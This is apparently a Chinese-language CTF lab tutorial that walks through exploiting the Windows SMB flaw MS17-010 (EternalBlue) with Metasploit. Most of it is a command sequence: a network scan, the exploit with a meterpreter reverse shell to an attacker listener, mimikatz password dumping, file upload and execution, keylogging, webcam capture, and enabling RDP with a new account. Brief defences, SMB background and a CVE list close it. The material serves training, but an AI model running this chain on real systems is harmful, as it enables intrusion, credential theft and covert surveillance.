Windows-smb漏洞利用介紹
作者:Evan 編輯:白帽子社區(qū)運(yùn)營團(tuán)隊(duì)
"白帽子社區(qū)在線CTF靶場BMZCTF,歡迎各位在這里練習(xí)、學(xué)習(xí),BMZCTF全身心為網(wǎng)絡(luò)安全賽手提供優(yōu)質(zhì)學(xué)習(xí)環(huán)境,鏈接(http://www.bmzclub.cn/)
"


1、metasploit介紹




首先進(jìn)入平臺點(diǎn)擊環(huán)境申請,進(jìn)入kali系統(tǒng)發(fā)現(xiàn)eth0未啟用:


此時(shí)網(wǎng)絡(luò)已經(jīng)設(shè)置好了:

使用ping命令發(fā)現(xiàn)網(wǎng)絡(luò)是通的:

在kali當(dāng)中啟動metasploit工具,通過msfconsole指令進(jìn)行啟動:

Search命令搜索ms17-010漏洞掃描模塊,圖中圈中的就是漏洞掃描模塊。執(zhí)行:search ms17-010 //搜索ms17-010相關(guān)漏洞利用模塊

msf > use auxiliary/scanner/smb/smb_ms17_010 (利用模塊該掃描模塊并且設(shè)置相關(guān)掃描范圍信息)。執(zhí)行:use auxiliary/scanner/smb/smb_ms17_010 //選擇使用該模塊執(zhí)行搜索選項(xiàng)set rhosts 192.168.1.0/24 //設(shè)置掃描的網(wǎng)段范圍set threads 50 //設(shè)置掃描的線程,數(shù)值越大掃描速度越快run //開始運(yùn)行即開始執(zhí)行掃描
執(zhí)行掃描過后,結(jié)果如下所示,從結(jié)果中可以看到在當(dāng)前掃描的網(wǎng)段中存在一個(gè)windows 2008和7版本的操作系統(tǒng)存在ms17-010漏洞

接下來進(jìn)行漏洞利用過程即可,執(zhí)行:use exploit/windows/smb/ms17_010_eternalblue //選擇漏洞利用模塊set payload windows/x64/meterpreter/reverse_tcp //設(shè)置漏洞利用完成后的反彈模塊,用以接收回饋信息set lhost 192.168.1.8 //設(shè)置反彈IP地址set lport 6666 //設(shè)置反彈端口set rhost 192.168.1.15 //設(shè)置被攻擊的目標(biāo)主機(jī)

show options //檢查設(shè)定的信息


exploit //開始進(jìn)行漏洞利用


到這里即顯示漏洞利用已成功。
查看IP地址、查看進(jìn)程信息。

查看進(jìn)程信息:

獲取密碼,執(zhí)行:load mimikatz //加載獲取密碼的模塊msv //利用mimikatz的msv獲取密文hashKerberos //獲取明文密碼*****


上傳文件
在kali根目錄下創(chuàng)建了一個(gè)aaa.exe的文件,將其上傳至目標(biāo)操作系統(tǒng)當(dāng)中C盤下。upload /aaa.exe c://

上傳之前的C盤:

上傳之后:


拓展:
1. execute -f test.txt //執(zhí)行該文件,如是木馬文件即可成功執(zhí)行并觸發(fā)

2. 截取目標(biāo)屏幕快照screenshot可以看到圖片以及在root目錄下面,直接下載查看

3. 鍵盤記錄run post/windows/capture/keylog_recorder //運(yùn)行鍵盤記錄器,用戶打開記事本開始寫文本,得到結(jié)果

4. 調(diào)用目標(biāo)系統(tǒng)攝像頭webcam_list //查看目標(biāo)攝像頭設(shè)備列表webcam_chat //開啟攝像頭錄像webcam_snap //開啟攝像頭拍照webcam_stream //開啟攝像頭直播


5、開啟目標(biāo)遠(yuǎn)程
開啟目標(biāo)遠(yuǎn)程,并創(chuàng)建一個(gè)test帳戶:
meterpreter > run post/windows/manage/enable_rdp username="test" password="123456"
使用剛才創(chuàng)建的用戶和密碼進(jìn)行遠(yuǎn)程,進(jìn)行遠(yuǎn)程控制:
root@kali:~# rdesktop 192.168.10.105 -u test -p 123456

6、防范措施
關(guān)閉445等高危端口
配置防火墻,安裝防護(hù)軟件
安裝補(bǔ)丁

7、基礎(chǔ)知識介紹
何為永恒之藍(lán)?
永恒之藍(lán)(Eternal Blue)爆發(fā)于2017年4月14日晚,是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來獲取系統(tǒng)的最高權(quán)限,以此來控制被入侵的計(jì)算機(jī)。甚至于2017年5月12日, 不法分子通過改造“永恒之藍(lán)”制作了wannacry勒索病毒,使全世界大范圍內(nèi)遭受了該勒索病毒,甚至波及到學(xué)校、大型企業(yè)、政府等機(jī)構(gòu),只能通過支付高額的贖金才能恢復(fù)出文件。不過在該病毒出來不久就被微軟通過打補(bǔ)丁修復(fù)。
什么是SMB協(xié)議?
SMB(全稱是Server Message Block)是一個(gè)協(xié)議服務(wù)器信息塊,它是一種客戶機(jī)/服務(wù)器、請求/響應(yīng)協(xié)議,通過SMB協(xié)議可以在計(jì)算機(jī)間共享文件、打印機(jī)、命名管道等資源,電腦上的網(wǎng)上鄰居就是靠SMB實(shí)現(xiàn)的;SMB協(xié)議工作在應(yīng)用層和會話層,可以用在TCP/IP協(xié)議之上,SMB使用TCP139端口和TCP445端口。
SMB工作原理是什么?
(1):首先客戶端發(fā)送一個(gè)SMB negport 請求數(shù)據(jù)報(bào),,并列出它所支持的所有SMB的協(xié)議版本。服務(wù)器收到請求消息后響應(yīng)請求,并列出希望使用的SMB協(xié)議版本。如果沒有可以使用的協(xié)議版本則返回0XFFFFH,結(jié)束通信。
(2):協(xié)議確定后,客戶端進(jìn)程向服務(wù)器發(fā)起一個(gè)用戶或共享的認(rèn)證,這個(gè)過程是通過發(fā)送SessetupX請求數(shù)據(jù)包實(shí)現(xiàn)的??蛻舳税l(fā)送一對用戶名和密碼或一個(gè)簡單密碼到服務(wù)器,然后通過服務(wù)器發(fā)送一個(gè)SessetupX應(yīng)答數(shù)據(jù)包來允許或拒絕本次連接。
(3):當(dāng)客戶端和服務(wù)器完成了磋商和認(rèn)證之后,它會發(fā)送一個(gè)Tcon或TconX SMB數(shù)據(jù)報(bào)并列出它想訪問的網(wǎng)絡(luò)資源的名稱,之后會發(fā)送一個(gè)TconX應(yīng)答數(shù)據(jù)報(bào)以表示此次連接是否接收或拒絕。
(4):連接到相應(yīng)資源后,SMB客戶端就能夠通過open SMB打開一個(gè)文件,通過read SMB讀取文件,通過write SMB寫入文件,通過close SMB關(guān)閉文件。</font>
雖然這個(gè)漏洞是比較早期的,但是非常適合新手訓(xùn)練,引領(lǐng)入門;現(xiàn)在很多的服務(wù)有的還是搭建在這個(gè)系統(tǒng)上,危害性還是比較高,引起重視為好,個(gè)人建議如危險(xiǎn)常見端口、插件等最好不要暴露出來,再增加WAF、防火墻、入侵檢測等防護(hù)措施。
列舉最近新的漏洞如下:
漏洞名稱 | CVE編號 |
4images 跨站腳本漏洞 | CVE-2021-27308 |
Puppet Discovery 安全漏洞 | CVE-2018-11747 |
Sundray WLAN Controller 命令注入漏洞 | CVE-2019-9161 |
Nginx 安全漏洞 | CVE-2018-16844 |
ZZCMS SQL注入漏洞 | CVE-2018-1000653 |
Mitsubishi Electric GOT2000 安全漏洞 | CVE-2021-20592 |
Veyon Service 安全漏洞 | CVE-2020-15261 |
ELECOM 多款產(chǎn)品安全漏洞 | CVE-2021-20738 |
Linux kernel 安全漏洞 | CVE-2021-35039 |
WordPress 訪問控制錯(cuò)誤漏洞 | CVE-2021-34626 |
just-safe-set 安全漏洞 | CVE-2021-25952 |
Google Android信息泄露漏洞 | CVE-2021-0597 |
Software License Manager 跨站請求偽造漏洞 | CVE-2021-20782 |
WordPress 跨站請求偽造漏洞 | CVE-2021-20781 |
MDT AutoSave代碼問題漏洞 | CVE-2021-32961 |
Google Android 安全漏洞 | CVE-2021-31816 |
Octopus Server 安全漏洞 | CVE-2021-31817 |
Mikrotik RouterOs 安全漏洞 | CVE-2020-20217 |
PrusaSlicer 安全漏洞 | CVE-2020-28598 |
MDT AutoSave加密問題漏洞 | CVE-2021-32945 |
Eclipse TinyDTLS 安全特征問題漏洞 | CVE-2021-34430 |
QEMU 安全漏洞 | CVE-2021-3638 |
Aruba ClearPass Policy Manager 安全漏洞 | CVE-2021-34614 |
Elasticsearch 安全漏洞 | CVE-2021-22144 |
Fortinet FortiManager 安全漏洞 | CVE-2021-24022 |
Allen Bradley Micrologix 1100輸入驗(yàn)證錯(cuò)誤漏洞 | CVE-2021-33012 |
Google Android 安全漏洞 | CVE-2021-0592 |
Cisco Video Surveillance 7000 Series IP Cameras 安全漏洞 | CVE-2021-1598 |
IBM InfoSphere Information Server 跨站腳本漏洞 | CVE-2021-29712 |
Samsung Members 信息泄露漏洞 | CVE-2021-25432 |
Samsung Tizen安全漏洞 | CVE-2021-25433 |
Samsung Mobile Device Cameralyzer 訪問控制錯(cuò)誤漏洞 | CVE-2021-25431 |
Samsung Tizen 代碼注入漏洞 | CVE-2021-25434 |
MDT AutoSave 路徑遍歷漏洞 | CVE-2021-32949 |
Samsung Tizen代碼注入漏洞 | CVE-2021-25435 |
Samsung Tizen代碼注入漏洞 | CVE-2021-25436 |
Samsung Tizen代碼注入漏洞 | CVE-2021-25437 |
Samsung Members訪問控制錯(cuò)誤漏洞 | CVE-2021-25438 |
Samsung Members 訪問控制錯(cuò)誤漏洞 | CVE-2021-25439 |
Samsung Mobile FactoryCameraFB 訪問控制錯(cuò)誤漏洞 | CVE-2021-25440 |
Bluetooth 授權(quán)問題漏洞 | CVE-2021-25430 |
Samsung Mobile AR Emoji Editor 輸入驗(yàn)證錯(cuò)誤漏洞 | CVE-2021-25441 |
IBM InfoSphere Information Server 安全漏洞 | CVE-2021-29730 |
Samsung KCS安全漏洞 | CVE-2021-25442 |
